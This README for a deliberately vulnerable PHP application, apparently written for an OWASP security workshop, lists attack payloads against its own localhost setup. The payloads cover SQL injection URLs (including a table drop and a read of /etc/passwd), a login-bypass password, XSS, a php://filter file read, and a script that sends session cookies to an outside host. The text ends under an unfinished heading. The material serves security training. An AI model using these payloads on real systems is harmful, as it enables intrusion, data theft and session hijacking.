
Owasp 2017 Security Workshop

Primary LanguagePHP

This code has been developed in such a way that it is vulnerable to the most basic and common website security exploits. It's meant to contain all the bad practices.

SQL Injection / XSS / Session Hijacking are all available through this codebase.

Note: Some of these might not work if your database user doesn't have sufficient privileges.


  1. Load the db.sql file to your database.
  2. Change the consts.php file to contain the username and password of database user.
  3. Load your site.


SQL Injection:

http://localhost/?username=jared'%20or%20'1'='1 http://localhost/?username=jared'%20or%20''=' http://localhost/index.php?id=1%20or%201=1 http://localhost/?id=1;drop%20table%20invoices -- doesn't work because mysql_query stacked query support -- but will work with other dbs http://localhost/index.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1 http://localhost/index.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world

Bypass Login:

Password: foo' or '1'='1


http://localhost/index.php?username=jared%3Cscript%3Ealert('Hi%20there!')%3C/script%3E http://localhost/template?load=php://filter/convert.base64-encode/resource=loadme

Use XSS to hijack a users session:

On the 'Send message' page:

Hey just wanted to say that you guys rock!

<script> new Image().src="http://somereallybadsite.tld/?c="+encodeURI(document.cookie); </script>

XSS to read files on disk:
